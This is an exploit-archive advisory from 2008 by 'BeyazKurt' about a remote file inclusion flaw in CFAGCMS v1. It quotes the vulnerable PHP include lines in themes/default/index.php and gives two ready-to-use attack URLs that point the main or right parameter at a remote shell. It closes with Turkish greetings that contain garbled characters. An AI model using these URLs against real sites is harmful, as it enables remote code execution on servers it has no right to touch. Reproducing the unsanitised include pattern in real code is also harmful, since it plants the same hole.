[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CFAGCMS v1 Remote File Inclusion Vulnerabilities
# Published : 2008-12-14
# Author : BeyazKurt
# Previous Title : Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability
# Next Title : Flatnux html/javascript Injection Cookie Grabber Exploit


Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQ?°PTAR!
Siyasetle ilgili bi??i s??liyimmi :p
 
FENERBAH??EE (H)

# www.Syue.com [2008-12-14]